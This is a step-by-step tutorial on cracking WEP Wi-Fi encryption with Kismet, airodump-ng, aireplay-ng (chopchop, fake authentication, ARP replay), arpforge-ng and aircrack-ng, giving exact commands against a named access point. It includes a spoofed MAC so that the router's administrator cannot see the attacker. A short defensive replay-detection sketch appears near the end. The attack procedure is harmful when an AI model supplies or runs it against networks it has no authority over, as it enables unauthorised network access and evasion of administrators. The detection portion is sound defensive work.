
WEP Cracking Tutorial

Hi, in this tutorial I will be showing you how to crack WEP without any traffic on the network. To use this tutorial you need to have packet injection working with your wireless card, Kismet, the aircrack suite, arpforge and a small amount of Linux knowledge (to open Konsole and put your card into monitor mode).

For this tutorial I have used the BackTrack (www.remote-exploit.org) Linux distribution, as it contains all the programs and it was easy to install packet injection for my driver.

My setup: Dell Inspiron 1300 with an Atheros wireless card running BackTrack (I will refer to this as BT), my D-Link DI-524 router which has 128-bit encryption, and nothing else connected wirelessly.

After you boot into BT (or any other distro you're using) put your card into monitor mode.

Start Kismet. We will use Kismet to find out the information we will need about the AP we wish to hack. Kismet will show all the wireless access points in range. I only have 1 in range (called Crossover) but you may have more around you.

Press s then b; this will let you scroll up and down the list till you find the AP you wish to crack, then press Enter. This will give you more information about the access point. Make a note of the name of it, the channel it's on and the BSSID (you can leave Kismet open and just come back to it later to get the info), and also make sure it's WEP (as this tutorial is for WEP).

We will now run airodump to capture the IVs (data) we will need to crack the WEP. Open a new Konsole and run "airodump-ng"; this will show you all the possible options you can use with this application.

We only need to capture, so we will use -w, which is what we will call the file we are capturing, and -c to specify a channel; this will make it easier for us to capture the data from our AP. I'm going to call my file "weptutorial" and my channel (the channel Kismet shows) is 8. We will also need to add the interface to use at the end of the command; iwconfig can show this but hopefully you know, mine is ath1. Here is the command I will use:

    airodump-ng -w weptutorial -c 8 ath1

We should see our AP come up, and we might have some traffic on it, we might not.

I don't have any data on mine (as I have no wireless devices connected to it).

Now we are capturing data; we will need about 200000 to 1000000 of these to crack WEP. While that's running, open a new Konsole and now we will speed up the traffic (if you have wireless devices and the data is going up fast enough then you don't need to do this stage).

We will now set up a method called chopchop. This is in aireplay-ng (run "aireplay-ng" like we did airodump-ng to see all the options) and it will capture any data and resend it over and over to make the traffic on the network so we can capture more. The command to do this is:

    aireplay-ng --chopchop -b 00:0F:3D:3D:94:72 ath1

    aireplay-ng          = the program name
    --chopchop           = the attack we are using
    -b 00:0F:3D:3D:94:72 = our AP's MAC address (Kismet has this info and airodump also shows it)
    ath1                 = our network interface

aireplay will keep reading packets till it finds one that it thinks contains an IV (data containing the WEP). If your network has wireless traffic on it then you should get one soon; if not (like me) then we can fake authentication with the AP and hopefully it will throw a packet or 2 out that we can catch.

To do this we open another Konsole and use the aireplay-ng command again but with a different attack method:

    aireplay-ng --fakeauth 50 -e Crossover -a 00:0F:3D:3D:94:72 -h 11:22:33:44:55:66 ath1

    aireplay-ng          = the program name
    --fakeauth 50        = the attack we are using, with the delay of 50
    -e Crossover         = the name of the AP
    -a 00:0F:3D:3D:94:72 = our AP's MAC address
    -h 11:22:33:44:55:66 = a fake MAC address for us to attack from so the router's admin can't see our real MAC address
    ath1                 = our network interface

We should see:

    Sending Authentication Request
    Authentication successful

After a while the attack will stop, but just rerun the command again. airodump will also show our new fake MAC is connected to the AP. Hopefully the chopchop method we started will now catch some data. Press y to let it send it; it will do something like this screenshot.

You will notice airodump has gone crazy too and lots of clients connected to the AP. Let it run its magic till the chopchop hits 100%.

Now we have a cap and xor file; we will turn this into a file we can send back to the AP. To do this run an app called arpforge-ng. This will edit the capture slightly; I'm not going to go into detail about this app.

    arpforge-ng replay_dec-0831-173203.xor 1 00:0F:3D:3D:94:72 11:22:33:44:55:66 192.168.0.200 192.168.0.1 arp.cap

    arpforge-ng                = the program name
    replay_dec-0831-173203.xor = the xor file that was caught by the chopchop method, yours will be slightly different
    1                          = the type we are using
    00:0F:3D:3D:94:72          = the AP's MAC address
    11:22:33:44:55:66          = our fake MAC
    192.168.0.200              = the IP source, this can be anything
    192.168.0.1                = the destination, this is the AP's IP
    arp.cap                    = the new capture filename

After this it will say done.

We will now send this modified capture file lots of times, and very fast; this will make the data in airodump go up.

    aireplay-ng --interactive -r arp.cap ath1

Press y when it asks if you want to send this packet.

The data in airodump should now be rising very fast.

At this stage you can stop the fakeauth with Ctrl+C. Wait till you have about 100000 before moving on (this may take a while); mine is doing about a hundred a second, so make a brew.
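From the defender's side, the replay stage above is easy to spot: the same captured frame is re-sent at a high rate, so it carries one unchanged WEP IV and one length from a single source. The sketch below is an added example, not part of the original tutorial; the record layout, thresholds, the ordinary client's MAC and all sample frames are constructed assumptions.

```python
from collections import defaultdict

BSSID = "00:0F:3D:3D:94:72"  # AP MAC address used in the tutorial

def build_sample():
    """Constructed frame records: (time_ms, source_mac, bssid, wep_iv_hex, length)."""
    frames = []
    # Ordinary client (hypothetical MAC): a fresh IV on every frame, varied sizes.
    for i in range(40):
        frames.append((i * 250, "aa:bb:cc:00:00:01", BSSID,
                       f"{0x1000 + i:06x}", 90 + (i % 7) * 20))
    # Replayed frame from the tutorial's fake MAC: one IV, one length, ~100/s.
    for i in range(300):
        frames.append((2000 + i * 10, "11:22:33:44:55:66", BSSID, "a1b2c3", 68))
    return sorted(frames)

def detect_replay(frames, window_ms=1000, min_repeats=50):
    """Flag senders that repeat one (IV, length) pair min_repeats times
    or more inside any window_ms span. A sender that encrypts each frame
    itself normally uses a new IV per frame, so heavy repetition points
    to a captured frame being re-sent."""
    stamps_by_frame = defaultdict(list)
    for ts, src, bssid, iv, length in sorted(frames):
        stamps_by_frame[(src, bssid, iv, length)].append(ts)

    alerts = {}
    for (src, bssid, iv, length), stamps in stamps_by_frame.items():
        start = peak = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_ms:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_repeats:
            alerts[(src, bssid)] = {"iv": iv, "length": length, "peak": peak}
    return alerts

if __name__ == "__main__":
    for (src, bssid), hit in detect_replay(build_sample()).items():
        print(f"replay suspected: {src} -> {bssid} IV={hit['iv']} "
              f"len={hit['length']} peak={hit['peak']} per window")
```

Alerting on this pattern only buys time on a WEP network; the fix is to move the AP to WPA2 or WPA3.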

When it hits around 100000 we could start to crack the WEP. We will leave the rest running and catching data so it will improve our chances.

Cracking Time

Open a new Konsole and run the command "aircrack-ng" to see all the possible options; we will only be using a few.

    aircrack-ng -a 1 -e Crossover -b 00:0F:3D:3D:94:72 weptutorial-02.cap

    aircrack-ng          = the program name
    -a 1                 = this is to choose what we are cracking, 1 = WEP, 2 = WPA-PSK
    -e Crossover         = the AP name
    -b 00:0F:3D:3D:94:72 = the AP MAC address
    weptutorial-02.cap   = this is the capture file that you named when you started airodump; it will probably add -01 to yours, but as I already had one called that it made it -02. Just use tab to find out or look in the folder.

It is now testing your keys and hopefully this will find your key (this will also take time, make a sandwich).

Remember, the higher the encryption the longer it can take.

If aircrack fails just restart it and let it catch more data; for this tutorial I needed over 800000.

This key (ModShackHack1) took me 1 hour 20 mins to crack; some may take less time, some may take more.

Hope You Crack Your WEP

McScruff
